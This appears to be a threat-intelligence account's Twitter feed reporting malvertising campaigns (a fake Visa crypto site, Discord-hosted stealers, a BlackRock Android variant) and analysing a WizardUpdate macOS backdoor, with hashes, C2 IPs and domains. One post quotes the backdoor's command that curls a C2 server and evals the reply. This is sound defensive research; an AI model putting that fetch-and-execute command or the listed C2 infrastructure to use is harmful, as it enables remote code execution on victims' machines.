@WeAreConfiant Threat Intelligence feeds account, fighting malvertisers since 2013 ⚔️

Joined December 2020
Visa has processed a cryptocurrency payment directly on the Ethereum blockchain as part of a new service the payment giant plans to introduce it, later this year. Guess what? Malvertisers too :) Below real site vs fake site (setup by malvertisers) can you spot the difference?
1
3
0
2
the malicious website visa-eth[.]com is a perfect copy and they deliver malware ! They changed the ”Apply now” button with download client 👾 can you spot the difference ?
1
0
0
0
The downloaded client is a RAMNIT Trojan 380f9cd4c7126115e730ccc7343c5bfe6a0e907c0d6113fd9dfb29bd55898d53 visa-eth.com-Setup.exe communicating to 194.135.20.72, metamaskio[.]space 31.31.196.172 , 23.108.57.102 (VNC module)
0
0
0
0
New malvertising campaign targeting US, PL, HK redirecting to malicious domains: reappcurvatheding[.]ga, hydbede[.]ga , toiklunex[.]gq , menctiluseemni[.]ga helptekxlensdercimas[.]gq anekenoh[.]gq delivering malware payloads hosted via @discord servers 👾😱 (Thread)
1
2
1
4
Malware Download page : <h1>Click to download</h1> <a href="cdn.discordapp.com/attachmen…"><img src="cap eng.png" alt="cap" style="width:300px" ></a>
1
0
0
2
As of now, two malware spotted, one for Windows (Raccoon stealer) and Android (still under analysis) : e6b73a330e8708cc1799190e79707861235ca67d7a1d1cecbc80bd21ea95a02c And 9f17b1ed611601847aaf8e8e183a729f0f2fe32baf5192a2a6dce87a4768c750 Stay tuned ⏳
1
0
0
2
Confirmed, Android sample is a BlackRock android variant, targeting 141 banking android apps , communicating with C2 server, panel at: http://91[.]214[.]124[.]199/ #BlackRock #C2 #panel hosted in VPSSC Networks LTD
1
3
0
4
After our previous tweets, a new WizardUpdate macOS backdoor resurfaced. This time the .PKG was signed with : Developer ID: ALEX KARAMANOLIS (NPBQVS7625) SHA-256: 7cf06122d84e8aebc2ef15f72e61affa5e070d0e49581474f1ec64a162da6a50 C2: subvideotube[.]com What’s new? (thread)
1
12
1
21
The delivery mechanism using a signed .PKG file, with changes has been made on the backdoor code and ways to execute C2 commands. WizardUpdate backdoor hash is efbabbece4741dfd2692e89f72d487560090723e3150f79ec3975360799b0633 SubVideoTubeStatusAgent.zip
1
0
0
1
Instead of C2 commands executed with system() they are now executed using popen() :
1
0
0
3
What this popen() executes? It executes the following $CMD and runs an “eval” on C2 reply :) MAID=system_profiler SPHardwareDataType | awk '/UUID/ { print $3 }' API_URl = api.subvideotube.com/v2/uoi?…{MAID}&pr=subvideotube CMD=$(curl --connect-timeout 900 -L "{API_URL}");eval "$CMD"
1
0
0
1
We noted that the strings above were obfuscated using a Vigenère cipher with a hardcoded key in the sample “LBZEWWERBC” . Only that this Vigenère cipher implementation was deliberately copy/pasted from this GitHub repo: github.com/philipperemy/easy…
1
0
0
2
Below is the original source code VS this backdoor decompiled code we see clearly a 100% match, we also notice the function names weren’t stripped
1
0
0
3
Another copy paste, the decrypt() function is exactly the same as well:
1
0
0
2
Finally we can find the strings obfuscated within the binary, and our script on the right to decrypt them:
1
0
0
2
Malvertisers, maybe you should try harder? Again, Kudos to @Apple for revoking the certificate.
1
0
0
3
The sample 7cf06122d84e8aebc2ef15f72e61affa5e070d0e49581474f1ec64a162da6a50 we found isn’t on VT. So we just uploaded it . virustotal.com/gui/file/7cf0…
0
0
0
5